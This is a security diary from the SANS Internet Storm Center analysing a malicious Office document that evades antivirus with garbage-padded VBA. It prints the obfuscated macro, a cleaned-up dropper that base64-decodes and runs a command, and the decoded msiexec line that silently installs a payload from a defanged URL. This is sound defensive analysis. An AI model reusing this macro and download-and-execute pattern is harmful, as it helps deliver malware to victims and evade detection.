Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: Internet Storm Center - Internet Security | DShield Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Antivirus Evasion? Easy as 1,2,3

Published: 2018-05-25
Last Updated: 2018-05-25 07:08:11 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

For a while, ISC handlers have demonstrated several obfuscation techniques via our diaries. We always told you that attackers are trying to find new techniques to hide their content to not be flagged as malicious by antivirus products. Such of them are quite complex. And sometimes, we find documents that have a very low score on VT. Here is a sample that I found (SHA256: bac1a6c238c4d064f8be9835a05ad60765bcde18644c847b0c4284c404e38810). It gets a score of 6/59[1] which is not bad (from an attacker perspective). Is it a targeted attack? A new “APT” (buzzword!), not really…

The sample gets my attention because it was flagged as malicious by only 6 antivirus products and none from the top players. When you open it, you see a classic warning message:

The goal is to make the victim execute the VBS macro attached to the document. Just go to the ‘Macro’ menu and open the macro called ‘TYpZVAnvPqNdqkDfBqeG’. The macro is of course obfuscated but it’s very easy to read the code. Just garbage code has been added with never-reached condition blocks and dummy variables:

Dim RSngVushPknGEPaVHjxjeSnJFJQjylGoIAcYFPErxtqoWOecXBdAw As Boolean
If 30 = 33 Then
Dim qEzfeaMeJjeeyyDmBQreGmlbymqeoLxIFsSwdtbos As Byte
Dim MnKMKYQbpWllWqESXgrkhqylVYGgGJIpDm As Date
End If
Dim tybPoOaDypMWiCNeFMjEKWpYqlRkUfNwikwGqIs As Boolean
If 44 = 37 Then
Dim dKdrJZzpEScEvFybWICZCwpjTbQoyFHnxUFugfgzrvNRsbSqjJaxoipgUu As Byte
Dim YhJKrzLoGbzEurbDhHjXqrJZEpeJzOeZamGyqgDOGDUqqfOiWkAixwDgYjG As Date
End If

I beautified the code for easier reading:

Dim string1 As String
Dim string2 As String

# Base64 Decode Function
Function func1(arg1)
    string2 = "Msxml2." & "DOMDocument"
    Dim object1
    Dim var4
    Set object1 = CreateObject(string2)
    string1 = bin.base64
    Set var4 = object1.createElement("ipKHiUOXckoBg")
    var4.DataType = string1
    var4.Text = arg1
    func1 = var4.NodeTypedValue
End Function

Sub main()
    On Error Resume Next
    i = 0
    var1 = "WSCript.shell"
    Dim var2
    Set var2 = CreateObject(var1)
    var3 =func1("bQBzAGkAZQB4AGUAYwAuAGUAeABlACAALwBpACAAaAB0AHQAcAA6AC [...] gAC8AcQB1AGkAZQB0AA==")
    var2.Run var3, i
End Sub

The function ‘func1’ is just a Base64 decoder and the Base64 string is decoded to:

msiexec.exe /i hxxp://nunovidente[.]pt/_output6fd4680.msi /quiet

You can see that, like most Microsoft tools, msiexec.exe accepts an URL as a filename to automatically download it before the installation. From the msiexec.exe syntax help:

</package | /i> <Product.msi> : Installs or configures a product

Since I found the document, the payload has been removed. It was not available on VT (SHA256: 51b53eaa4fe6790b60bd2a88b934baa3de841462513904f9c8bd048414f6eece). The MSI file installs a malicious binary (SHA256: aa3fec1cbd6d6395c20d0ae1b42879b28bbe1b451625174d38d49e30b13ed455)[2] which communicates with hxxp://mountaintopbuilders[.]com/wp-admin/user/five/fre.php. Hopefully, this one has a better detection score.

This demonstrates that running a classic antivirus is mandatory but remains a weak protection. They can be easily evaded with simple obfuscation. If you’re interested in MSI files analysis, Didier wrote a diary on this topic[3].

[1] https://www.virustotal.com/#/file/bac1a6c238c4d064f8be9835a05ad60765bcde18644c847b0c4284c404e38810/detection
[2] https://www.virustotal.com/#/file/aa3fec1cbd6d6395c20d0ae1b42879b28bbe1b451625174d38d49e30b13ed455/detection
[3] https://isc.sans.edu/forums/diary/Analyzing+MSI+files/23355

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

"Blocked" Does Not Mean "Forget It"
May 24th 2018
2 days ago by Xme (3 comments)

Track naughty and nice binaries with Google Santa
May 23rd 2018
3 days ago by Remco (0 comments)

Malware Distributed via .slk Files
May 22nd 2018
4 days ago by Xme (2 comments)

Something Wicked this way comes
May 21st 2018
5 days ago by Rick (0 comments)

DASAN GPON home routers exploits in-the-wild
May 20th 2018
5 days ago by DidierStevens (5 comments)

Malicious Powershell Targeting UK Bank Customers
May 19th 2018
1 week ago by Xme (2 comments)

View All Diaries →

Latest Discussions

NagiosXI 5.2.6 – 5.4.12 unauthenticated exploit chain leads to root access
created May 11th 2018
2 weeks ago by Remco (0 replies)

MinerPool Threat Feed info
created Apr 4th 2018
1 month ago by Anonymous (0 replies)

DShield on RPi returns no mySQL when running /home/pi/install/dshield/bin/status.sh
created Mar 29th 2018
1 month ago by nekton89 (0 replies)

Splunk: Any way to fetch logs via ssh
created Mar 15th 2018
2 months ago by Anonymous (2 replies)

Possible new worm activity
created Mar 13th 2018
2 months ago by Anonymous (0 replies)

View All Forums →

Latest News

View All News →

Top Diaries

Wide-scale Petya variant ransomware attack noted
Jun 27th 2017
10 months ago by Brad (6 comments)

Using a Raspberry Pi honeypot to contribute data to DShield/ISC
Aug 3rd 2017
9 months ago by Johannes (16 comments)

Second Google Chrome Extension Banker Malware in Two Weeks
Aug 29th 2017
8 months ago by Renato (0 comments)

Detection Lab: Visibility & Introspection for Defenders
Dec 15th 2017
5 months ago by Russ McRee (2 comments)

Maldoc with auto-updated link
Aug 17th 2017
9 months ago by Xme (2 comments)